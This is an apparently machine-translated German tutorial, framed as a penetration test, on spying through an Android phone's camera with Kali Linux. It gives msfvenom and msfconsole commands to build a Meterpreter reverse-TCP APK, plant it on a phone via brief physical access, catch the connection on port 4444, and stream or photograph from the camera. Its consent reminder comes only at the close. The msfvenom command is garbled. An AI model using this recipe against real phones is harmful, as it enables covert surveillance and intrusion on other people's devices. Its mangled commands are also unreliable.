So führen Sie einen Penetrationstest auf einer Android-Telefonkamera mit Kali Linux durch
Es gab mehrere Nachrichten darüber, dass Hacker die Kameras von Android-Telefonen kaperten, um ihre Benutzer abzuhören oder sie mit gefälschten Bildern zu versorgen. Als Besitzer eines Alarmtelefons möchten Sie dies möglicherweise verhindern, indem Sie die Wahrscheinlichkeit und die tatsächlichen Risiken eines solchen Bedrohungsereignisses einschätzen.
Kali Linux ist eines der besten Tools, um die potenziellen Schwachstellen Ihrer Android-Telefonkamera durch einen Penetrationstest zu überprüfen. Es kann Ihnen helfen, den Überblick über alle Hackerversuche zu behalten, die aus der Ferne auf die Telefonkamera zugreifen.
Installieren einer Exploit-Payload
Um Kali Linux für einen Penetrationstest zu verwenden, laden Sie es zunächst von der offiziellen Website herunter. In diesem früheren Tutorial finden Sie die Definitionen verschiedener Jargons wie „msfvenom“, „msfconsole“, „meterpreter“ und mehr, die in dieser Übung verwendet werden.
Der erste Schritt beim Penetrationstest besteht darin, eine Standard-Exploit-Nutzlast auf dem Gerät zu installieren. Öffnen Sie dazu das Kali-Linux-Terminal und geben Sie den folgenden Befehl ein: ifconfig
. Dadurch erhalten Sie die IP-Adresse Ihrer Kali Linux-Sitzung.
Geben Sie nun den unten gezeigten Befehl mit der oben genannten IP-Adresse ein. Die Portnummer für Exploits, Trojaner und andere Schwachstellen wird im Allgemeinen mit 4444 angegeben.
msfvenom - p android/meterpreter/reverse_tcp L HOST=IP address LPORT=Number R > Payload.apk
Versuchen Sie in diesem Schritt, eine Metasploit-Nutzlast einzuschleusen, die auf einem Java-Interpreter basiert. Bei Erfolg hilft Ihnen der Penetrationstest dabei, zu überprüfen, ob Ihr Telefon anfällig dafür ist, dass jemand Telefonanrufe abhört, auf SMS-Nachrichten zugreift, den Benutzer geolokalisiert usw.
In diesem Fall soll gezeigt werden, wie der Exploit möglicherweise genutzt werden kann, um auf die Kameras des Telefons zuzugreifen.
Sobald der Exploit gestartet wird, wird eine APK-Datei namens „Payload“ im Stammordner installiert. Sie müssen es auf einem Ziel-Android-Telefon installieren. Allerdings ist es leichter gesagt als getan. Die meisten neueren Android-Telefone und E-Mails weigern sich, solche mit Malware infizierten Dateien zu übertragen, und das ist gut so.
Dies kann jedoch weiterhin über ein USB-Kabel oder temporäre Dateien erreicht werden. Wenn ein Hacker für ein paar Minuten Zugriff auf Ihr Telefon hat, ist es einigermaßen angreifbar. Bei diesem Penetrationstest geht es uns darum, das genaue Ausmaß des damit verbundenen Risikos zu ermitteln.
Nach der Übertragung müssen Sie eine Möglichkeit finden, die Nutzlastdatei auf Ihrem Telefon zu installieren. Sofern es sich nicht um eine sehr alte Android-Version handelt, sollte Ihr Telefon mehrere Warnungen anzeigen, bevor die APK installiert werden kann. Dennoch gibt es unabhängig von der Android-Telefonversion viele andere Möglichkeiten, Apps aus unbekannten Quellen auf einem Android-Telefon zu installieren.
Den Exploit starten
Um den oben genannten Payload-Exploit zu starten, geben Sie den folgenden Befehl ein: msfconsole
. Es dauert nur wenige Sekunden, bis der Befehl ausgeführt wird, und der Metasploit kann für weitere Penetrationstests auf den Kameras des Telefons vorbereitet werden.
Der Metasploit gibt eine eigene vollständige Beschreibung. Die Nutzlastzusammenfassung ist ebenfalls sichtbar. Es zeigt die Anzahl der Exploits, die am Werk sind.
Im nächsten Schritt ist die msfconsole bereit, den Exploit zu starten. Beziehen Sie sich dazu auf die zuvor besprochene IP-Adresse und Portnummer (4444). Geben Sie dementsprechend folgende Befehle ein:
exploit (multi/handler) > set LHOST "IP Address" [ENTER] set LPORT "Port number" [ENTER] exploit [ENTER]
Wenn der Reverse-TCP-Handler aktiviert ist, werden verschiedene Phasen des Meterpreter-Starts angezeigt. Warten Sie einige Sekunden, während das Zieltelefon diagnostiziert wird.
An dieser Stelle muss erwähnt werden, dass die meisten modernen Android-Telefone diesen Zugriff weiterhin verweigern werden. Denken Sie daran, dass es sich hierbei um einen Penetrationstest handelt. Wenn Ihr Android-Telefon mit dieser tödlichen APK-Datei nicht gehackt werden kann, bedeutet dies, dass Ihr Telefonhersteller diesen speziellen Angriffsvektor kennt.
Zugriff auf die Kamera des Android-Telefons
Wenn Sie den Exploit erfolgreich in das Telefon einschleusen konnten, besteht nun die Möglichkeit, dass er eingedrungen werden kann. In diesem Fall kann der „Meterpreter“ auf einem Kali-Linux-Terminal eine Verbindung mit dem Telefon herstellen. Fügen Sie an dieser Stelle help
ein, um auf mehrere Optionen innerhalb des angegriffenen Android-Telefons zuzugreifen.
Geben Sie die folgenden Befehle (aus dem Hilfemenü) ein, um auf die Kameras Ihres Telefons zuzugreifen. Bei diesem Exploit wurde versucht, auf die Rückkamera zuzugreifen, um Bilder vom Terminal aus aufzunehmen.
webcam_list [ENTER] 1. Back camera 2. Front camera [ENTER] webcam_stream -i 1
Um einen erfolgreichen Penetrationstest abzuschließen, machen Sie, sobald Sie auf die Kamera zugreifen können, ein Foto und speichern Sie es im Stammordner von Kali Linux. Sie können auch die anderen gespeicherten Bilder bearbeiten, umbenennen oder löschen. Daher ist jedes erfolgreiche Eindringen in das getestete Telefon ein Weckruf hinsichtlich der Wahrscheinlichkeit eines echten Angriffs, was bedeutet, dass es an der Zeit ist, einen Sicherheitspatch zu installieren.
In diesem Tutorial haben Sie erfahren, wie von einem Kali-Linux-Terminal aus auf eine Android-Kamera für Penetrationstests zugegriffen werden kann.
Dies ist ein Artikel zur Sicherheitsforschung. Wenn Sie für eine Demonstration auf die Kamera einer anderen Person zugreifen, holen Sie immer zuerst deren Erlaubnis ein – es sei denn, es handelt sich natürlich um Ihr eigenes Telefon. Vergessen Sie nicht, sich diese Hacking-Apps für Android anzusehen, die Ihnen dabei helfen, Ihr Telefon zu testen und Schwachstellen zu finden